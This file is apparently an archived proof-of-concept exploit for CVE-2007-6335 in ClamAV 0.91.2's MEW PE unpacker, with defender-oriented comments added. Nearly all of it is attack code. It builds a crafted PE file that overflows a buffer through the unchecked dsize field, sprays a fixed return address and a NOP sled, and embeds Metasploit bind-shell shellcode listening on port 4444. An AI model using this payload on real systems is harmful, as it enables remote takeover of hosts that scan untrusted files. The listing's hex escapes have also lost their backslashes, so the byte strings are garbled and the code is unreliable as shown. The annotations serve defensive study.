
# Title : ClamAV 0.91.2 libclamav MEW PE Buffer Overflow Exploit
# Published : 2008-01-07
# Author : Thomas Pollet


''' 
 
 clamav-0.91.2 exploit ( CVE-2007-6335 )
 (c) Thomas Pollet thomas.pollet@gmail.com

 we own dsize in 
 read(desc, src + dsize, exe_sections[i + 1].rsz)) != exe_sections[i + 1].rsz)
 exploited with randomize_va_space = 0
 
'''

# Proof-of-concept generator for CVE-2007-6335 (ClamAV 0.91.2, libclamav MEW
# PE unpacker).  It writes a crafted PE file, exploit.exe, in which the
# attacker-controlled MEW size field (dsize) reaches read() unchecked and
# overruns the destination buffer (see the docstring above).
#
# Defender's view: the crafted file is the attack vector -- a malicious PE
# handed to the scanner.  The docstring states it requires
# randomize_va_space = 0, i.e. the hard-coded return address below assumes
# ASLR is off; keeping ASLR enabled and updating libclamav to a release that
# fixes CVE-2007-6335 (check the vendor advisory for the exact version) are
# the mitigations.  Scanners that process untrusted input should run
# unprivileged and sandboxed so a parser bug does not become host compromise.
#
# NOTE(review): the backslashes of the \xNN escapes appear to have been lost
# when this listing was archived, so the string literals below are plain
# text rather than the byte values the author wrote.

import struct

# Crafted PE image as a Python 2 byte string: "x4dx5a" / "x50x45" are the
# MZ and PE signatures and "x4dx45x57" ("MEW") marks the packer header.
# The words DSIZE, SSIZE, COPYSIZE and CRAP are placeholders replaced below.
exe=(
"x4dx5ax00x00x00x00x00x00x00x00x00x00x50x45x00x00x4cx01x02x00"
"x00x00x00x00x00x00x00x00x00x00x00x00xe0x00x0fx01x0bx01x00x00"
"x00x02x00x00x00x00x00x00x00x00x00x00x06x53x00x00x00x10x00x00"
"x0cx00x00x00x00x00x40x00x00x10x00x00x00x02x00x00x04x00x00x00"
"x00x00x00x00x04x00x00x00x00x00x00x00x00x60x00x00x00x02x00x00"
"x00x00x00x00x05x00x00x00x00x00x20x00x00x10x00x00x00x00x10x00"
"x00x10x00x00x00x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00"
"x0bx53x00x00x15x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x4dx45x57x00x46x12xd2xc3xffxfa"
"DSIZE"
"x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xe0x00x00xc0"
"x02xd2x75xdbx8ax16xebxd4"
"SSIZE"
"x00x50x00x00xffxffxffx00"
"x00x02x00x00x00x00x00x00x00x00x00x00x00x00x00x00xe0x00x00xc0"
"xbex1cx50x40x00x8bxdexadxadx50xadx97xb2x80xa4xb6x80xffx13x73"
"xf9x33xc9xffx13x73x16x33xc0xffx13x73x21xb6x80x41xb0x10xffx13"
"x12xc0x73xfax75x3exaaxebxe0xe8x76x4ex00x00x02xf6x83xd9x01x75"
"x0exffx53xfcxebx26xacxd1xe8x74x2fx13xc9xebx1ax91x48xc1xe0x08"
"xacxffx53xfcx3dx00x7dx00x00x73x0ax80xfcx05x73x06x83xf8x7fx77"
"x02x41x41x95x8bxc5xb6x00x56x8bxf7x2bxf0xf3xa4x5exebx9bxadx85"
"xc0x75x90xadx96xadx97x56xacx3cx00x75xfbxffx53xf0x95x56xadx0f"
"xc8x40x59x74xecx79x07xacx3cx00x75xfbx91x40x50x55xffx53xf4xab"
"x85x01x75xe5xc3x00x00x00x00x00x00x00"
"COPYSIZE"
"CRAP"
"x73x00xe9x49xaexffxffx0cx50x00x00x00x00x00x00x00"
"x00x00x00xddx52x00x00x0cx50x00x00")

# Payload, per the author's own comment: a Metasploit linux/x86 bind shell
# listening on TCP 4444.  Detection hint: successful exploitation would show
# up as an unexpected listening socket owned by the scanner process.
shellcode= ( #linux_ia32_bind -  LPORT=4444 Size=84 Encoder=None http://metasploit.com */
"x31xdbx53x43x53x6ax02x6ax66x58x99x89xe1xcdx80x96"
"x43x52x66x68x11x5cx66x53x89xe1x6ax66x58x50x51x56"
"x89xe1xcdx80xb0x66xd1xe3xcdx80x52x52x56x43x89xe1"
"xb0x66xcdx80x93x6ax02x59xb0x3fxcdx80x49x79xf9xb0"
"x0bx52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53"
"x89xe1xcdx80"
)

# Fill in the attacker-controlled size fields.  dsize is the value the
# docstring identifies as reaching read() unchecked; the other constants
# are presumably tuned to the 0.91.2 binary layout -- not derivable here.
exe = exe.replace("DSIZE",struct.pack('<L',0x01010000 | 0xb67b))#dsize
exe = exe.replace("SSIZE",struct.pack('<L',0x49838da9 + 0x7000 ))
exe = exe.replace("COPYSIZE",struct.pack('<L',0xf7070707 ))
exe = exe.replace("CRAP","A"*768)

# Presumably the overflow payload: one byte of padding, a single fixed
# return address repeated 16000 times, 0x4000 bytes of what the author
# intended as 0x90 (x86 NOP) filler, then the shellcode.  The fixed address
# is exactly why ASLR (randomize_va_space != 0) defeats this exploit.
exe+="a" #alignment
exe+=struct.pack('<L', 0xbfff9010 ) * 16000 #return address
exe+="x90"* 0x4000
exe+=shellcode

# Write the crafted PE.  Python 2 semantics assumed (struct.pack returns a
# str), so text mode "w" emits the bytes unchanged on POSIX -- confirm.
fout = open("exploit.exe","w")
fout.write(exe)
fout.close()
